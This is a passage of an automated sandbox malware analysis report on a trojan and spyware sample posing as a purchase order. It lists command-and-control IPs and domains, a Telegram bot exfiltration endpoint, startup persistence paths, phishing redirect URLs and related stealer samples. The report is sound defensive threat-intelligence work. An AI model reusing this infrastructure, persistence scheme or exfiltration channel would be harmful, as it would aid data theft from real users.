                                                                                                                                                https://www.autoitscript.com/site/autoit/8alg.exe, 00000003.00000003.3070682412.0000000001440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://54.244.188.177/PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099138098.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://54.244.188.177/tp$Valg.exe, 00000003.00000003.2092069897.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2101091606.0000000000600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://reallyfreegeoip.org/xml/RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://54.244.188.177/%&PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://54.244.188.177/Valg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                      unknown
                                                                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://54.244.188.177:80/ucqpyylPO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://crashpad.chromium.org/setup.exe1.3.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://54.244.188.177/ucqpyylPO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmp, PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://crash-reports.mozilla.com/submit?id=alg.exe, 00000003.00000003.2874497887.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://18.141.10.107/pmxflidirkcbpvm.Syalg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://support.google.com/chrome/?p=usage_stats_crash_reportssetup.exe1.3.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://pywolwnvd.biz/Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://54.244.188.177/falg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                          unknown
                                                                                                                                                                          http://54.244.188.177/ygrkxGrinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://54.244.188.177/fowvjqhqGrinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099585917.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://checkip.dyndns.orgserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000317C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..setup.exe1.3.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://54.244.188.177/tpzalg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.autoitscript.com/autoit3/alg.exe, 00000003.00000003.3026352524.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011197647.0000000001440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://18.141.10.107/pmxflidirkcbpvmalg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://18.141.10.107/d3Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://reallyfreegeoip.org/xml/8.46.123.75lserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://54.244.188.177:80/tpUalg.exe, 00000003.00000003.2093209407.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://54.244.188.177:80/ygrkGrinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://checkip.dyndns.comdserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://18.141.10.107:80/uqppkasccjtxkGrinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://reallyfreegeoip.org/xml/8.46.123.75dserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://54.244.188.177/&uXGrinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://18.141.10.107:80/pmxflidirkcbpvmalg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://checkip.dyndns.orgdserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://reallyfreegeoip.orgserver01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://go.microsoft.cRegSvcs.exe, 00000018.00000002.2277102302.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://www.winimage.com/zLibDllalg.exe, 00000003.00000003.2360118722.0000000001570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    132.226.8.169
                                                                                                                                                                                                    checkip.dyndns.comUnited States
                                                                                                                                                                                                    16989UTMEMUSfalse
                                                                                                                                                                                                    44.221.84.105
                                                                                                                                                                                                    saytjshyf.bizUnited States
                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                    104.21.67.152
                                                                                                                                                                                                    reallyfreegeoip.orgUnited States
                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    34.246.200.160
                                                                                                                                                                                                    tbjrpv.bizUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    172.234.222.143
                                                                                                                                                                                                    przvgke.bizUnited States
                                                                                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                                    pywolwnvd.bizUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    13.251.16.150
                                                                                                                                                                                                    ifsaia.bizUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    47.129.31.212
                                                                                                                                                                                                    xlfhhhm.bizCanada
                                                                                                                                                                                                    34533ESAMARA-ASRUfalse
                                                                                                                                                                                                    82.112.184.197
                                                                                                                                                                                                    vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                    43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                    18.141.10.107
                                                                                                                                                                                                    ssbzmoy.bizUnited States
                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                    Analysis ID:1561085
                                                                                                                                                                                                    Start date and time:2024-11-22 18:54:06 +01:00
                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 13m 33s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                    Number of analysed new started processes analysed:24
                                                                                                                                                                                                    Number of new started drivers analysed:3
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Sample name:PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal100.spre.troj.spyw.expl.evad.winEXE@32/146@26/10
                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                    • Successful, ratio: 81.8%
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 78%
                                                                                                                                                                                                    • Number of executed functions: 63
                                                                                                                                                                                                    • Number of non-executed functions: 284
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                    • Execution Graph export aborted for target Trading_AIBot.exe, PID 1276 because it is empty
                                                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1784 because it is empty
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                    • VT rate limit hit for: PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    12:55:02API Interceptor15x Sleep call for process: alg.exe modified
                                                                                                                                                                                                    12:55:09API Interceptor19x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                    12:55:16API Interceptor1x Sleep call for process: Grinnellia.exe modified
                                                                                                                                                                                                    12:55:48API Interceptor1335x Sleep call for process: apihost.exe modified
                                                                                                                                                                                                    18:55:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs
                                                                                                                                                                                                    18:55:09Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                    18:55:16AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    132.226.8.169sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    01831899-1 FDMS3008SDC.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    PO NO170300999.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                    44.221.84.105IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • jhvzpcfg.biz/qehuuaxgtrfd
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • hehckyov.biz/of
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • hehckyov.biz/sdgvcmfo
                                                                                                                                                                                                    8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • gahyhiz.com/login.php
                                                                                                                                                                                                    7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • vocyzit.com/login.php
                                                                                                                                                                                                    UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • vocyzit.com/login.php
                                                                                                                                                                                                    1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • gadyciz.com/login.php
                                                                                                                                                                                                    arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • vocyzit.com/login.php
                                                                                                                                                                                                    Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • gahyhiz.com/login.php
                                                                                                                                                                                                    WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                    • gadyciz.com/login.php
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    ssbzmoy.bizIBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    przvgke.bizIBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 172.234.222.143
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 172.234.222.143
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 172.234.222.138
                                                                                                                                                                                                    AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                    • 172.234.222.143
                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                    • 172.234.222.138
                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                    • 172.234.222.138
                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.234.222.138
                                                                                                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.234.222.138
                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.234.222.143
                                                                                                                                                                                                    RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                    • 172.234.222.143
                                                                                                                                                                                                    knjghuig.bizIBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                    • 18.141.10.107
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    CLOUDFLARENETUShttps://www.cinehub.click/anusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.21.30.239
                                                                                                                                                                                                    https://novelalert.cloudaccess.host/wp-admin/includes/contactamende/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.26.0.5
                                                                                                                                                                                                    https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.18.95.41
                                                                                                                                                                                                    https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 172.67.153.209
                                                                                                                                                                                                    https://insights.zohorecruit.com/ck1/2d6f.390d3f0/70932e40-a754-11ef-acd6-525400d4bb1c/c4b396bcef628ee60a3903dd64a571f46a43eb4a/2?e=AP6yJbny%2BojaTRJMo4YN29y4982EEh70QglqvV8aiCoCwftyNixblJXLnLCBIbU9pdrCb4rbSvPbWtRnPycgQw%3D%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.26.5.15
                                                                                                                                                                                                    https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.21.233.198
                                                                                                                                                                                                    https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                    UTMEMUShttp://mweb.webhop.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 132.226.118.109
                                                                                                                                                                                                    sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                                                    order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                                                    CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
